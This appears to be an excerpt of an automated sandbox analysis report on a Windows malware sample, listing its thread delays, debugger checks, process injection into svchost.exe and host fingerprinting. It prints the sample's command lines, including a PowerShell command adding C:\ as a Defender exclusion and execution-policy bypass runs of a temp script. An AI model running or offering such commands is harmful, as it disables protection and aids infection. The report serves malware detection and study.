                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6000
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3758
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Window / User API: threadDelayed 1767
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Window / User API: threadDelayed 3441
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Window / User API: threadDelayed 3897
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4151
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1673
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7371
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2030
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3856
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1838
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Dropped PE file which has not been started: C:\Users\user\Downloads\wpsv.5.6.3.exe
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\wpsv.5.6.3[1].exe
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Evasive API call chain: RegQueryValue,DecisionNodes,Sleep (graph_5-73746)
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Evasive API call chain: RegOpenKey,DecisionNodes,Sleep (graph_5-73745)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6100 Thread sleep count: 6000 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6100 Thread sleep count: 3758 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1740 Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 2128 Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 2836 Thread sleep count: 282 > 30
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 4484 Thread sleep count: 1767 > 30
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 4484 Thread sleep time: -1767000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 3636 Thread sleep count: 3441 > 30
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 3636 Thread sleep time: -34410s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 4484 Thread sleep count: 3897 > 30
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe TID: 4484 Thread sleep time: -3897000s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 732 Thread sleep count: 4151 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6468 Thread sleep count: 1673 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6596 Thread sleep time: -2767011611056431s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3696 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1732 Thread sleep count: 7371 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3760 Thread sleep time: -6456360425798339s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540 Thread sleep count: 2030 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3668 Thread sleep count: 3856 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3668 Thread sleep count: 1838 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5900 Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5468 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5432 Thread sleep count: 165 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4020 Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Thread sleep count: Count: 3441 delay: -10
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe File Volume queried: C:\ FullSizeInformation
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0040C86C FindFirstFileW,FindClose, 0_2_0040C86C
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0040C2A0 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW, 0_2_0040C2A0
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00650754 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose, 0_2_00650754
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0040C86C FindFirstFileW,FindClose, 5_2_0040C86C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0040C2A0 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW, 5_2_0040C2A0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_00650754 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose, 5_2_00650754
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_030780F0 wsprintfW,GetLogicalDriveStringsW,lstrcmpiW,lstrcmpiW,QueryDosDeviceW,lstrlenW,__wcsnicmp,lstrcpyW,lstrcpyW,lstrcatW, 5_2_030780F0
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_0040E56C GetSystemInfo, 0_2_0040E56C
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Thread delayed: delay time: 30000
                      Source: leBwnyHIgx.exe, 00000005.00000002.4132915170.0000000000898000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltrues
                      Source: powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Add-NetEventVmNetworkAdapter
                      Source: leBwnyHIgx.exe, 00000000.00000002.2077337213.00000000009AD000.00000004.00000020.00020000.00000000.sdmp, leBwnyHIgx.exe, 00000000.00000002.2077337213.0000000000960000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                      Source: leBwnyHIgx.exe, 00000005.00000002.4132915170.0000000000898000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWu?M
                      Source: powershell.exe, 0000000B.00000002.1781132282.00000000043C6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Get-NetEventVmNetworkAdapter
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe API call chain: ExitProcess graph end node (graph_5-72390)
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_10016A5E IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_10016A5E
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0308054D VirtualProtect ?,-00000001,00000104,? 5_2_0308054D
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_03077490 wsprintfW,LoadLibraryW,GetProcAddress,MultiByteToWideChar,swprintf,RegOpenKeyExW,RegQueryValueExW,RegCloseKey,FreeLibrary, 5_2_03077490
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00CD0AE4 mov eax, dword ptr fs:[00000030h] 0_2_00CD0AE4
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_00D90AE4 mov eax, dword ptr fs:[00000030h] 5_2_00D90AE4
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_026C0AE4 mov eax, dword ptr fs:[00000030h] 5_2_026C0AE4
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_02EF00CD mov eax, dword ptr fs:[00000030h] 5_2_02EF00CD
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_03076790 wsprintfW,GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,LookupAccountSidW,GetLastError,GetProcessHeap,HeapFree, 5_2_03076790
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_10016A5E IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_10016A5E
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_10016D55 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_10016D55
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe Code function: 0_2_00CE6D2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00CE6D2C
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0307DF10 Sleep,CloseHandle,GetLocalTime,wsprintfW,SetUnhandledExceptionFilter,CloseHandle,EnumWindows,EnumWindows,Sleep,EnumWindows,Sleep,CreateEventA,Sleep,RegOpenKeyExW,RegQueryValueExW,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,Sleep,CloseHandle,WaitForSingleObject,CloseHandle,Sleep,CloseHandle, 5_2_0307DF10
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_0307F00A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_0307F00A
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_03081F67 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_03081F67
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_02718587 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_02718587
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_02716815 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_02716815
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_10016A5E IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 5_2_10016A5E
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_10016D55 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_10016D55
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe Code function: 5_2_00DA6D2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 5_2_00DA6D2C

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: 5_2_030777E0 Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, 5_2_030777E0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\SysWOW64\svchost.exe 5_2_030777E0
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: Sleep,OpenProcess,_memset,_memset,GetSystemDirectoryA,GetFileAttributesA,CreateProcessA,OpenProcess,_memset,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetCurrentProcess,GetProcessId,_memset,GetModuleFileNameA,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,Sleep,VirtualProtectEx,VirtualProtectEx,VirtualProtectEx,ResumeThread, Windows\System32\svchost.exe 5_2_030777E0
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: 0_2_0063DDA4 ShellExecuteExW,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle, 0_2_0063DDA4
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Process created: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe "C:\Users\user\AppData\Roaming\leBwnyHIgx.exe"
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\Temp\\updated.ps1
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: 0_2_005B20A4 InitializeSecurityDescriptor,SetSecurityDescriptorDacl, 0_2_005B20A4
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: 0_2_005B1248 AllocateAndInitializeSid,GetVersion,GetModuleHandleW,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, 0_2_005B1248
                      Source: leBwnyHIgx.exe, 00000005.00000002.4135196957.0000000004571000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: inProgram Manager0
                      Source: leBwnyHIgx.exe, 00000005.00000003.2107248320.0000000004221000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .168.2.4 0 min287400Windows 10 Pro10.0.190454HDD:1WW 223 Gb Free 168 Gb Mem: 8 Gb Free3 Gb Microsoft Basic Render Driver 0 5140 Microsoft Basic Render Driver 0 5140 Program Manager
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: 0_2_004067C0 cpuid 0_2_004067C0
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: GetUserDefaultUILanguage,GetLocaleInfoW, 0_2_0040C9BC
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: GetLocaleInfoW, 0_2_005FB6B8
                      Source: C:\Users\user\Desktop\leBwnyHIgx.exe | Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 0_2_0040BE44
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: GetUserDefaultUILanguage,GetLocaleInfoW, 5_2_0040C9BC
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: GetLocaleInfoW, 5_2_005FB6B8
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 5_2_0040BE44
                      Source: C:\Users\user\AppData\Roaming\leBwnyHIgx.exe | Code function: _memset,_memset,_memset,gethostname,gethostbyname,inet_ntoa,_strcat_s,_strcat_s,inet_ntoa,_strcat_s,_strcat_s,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetLastInputInfo,GetTickCount,wsprintfW,wsprintfW,MultiByteToWideChar,MultiByteToWideChar,GetSystemInfo,wsprintfW,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrlenW,GetModuleHandleW,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,wsprintfW,GetCurrentProcessId,OpenProcess,K32GetProcessImageFileNameW,CloseHandle,GetTickCount,__time64,__localtime64,wsprintfW,GetLocaleInfoW,GetSystemDirectoryW,GetCurrentHwProfileW, 5_2_03075430
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
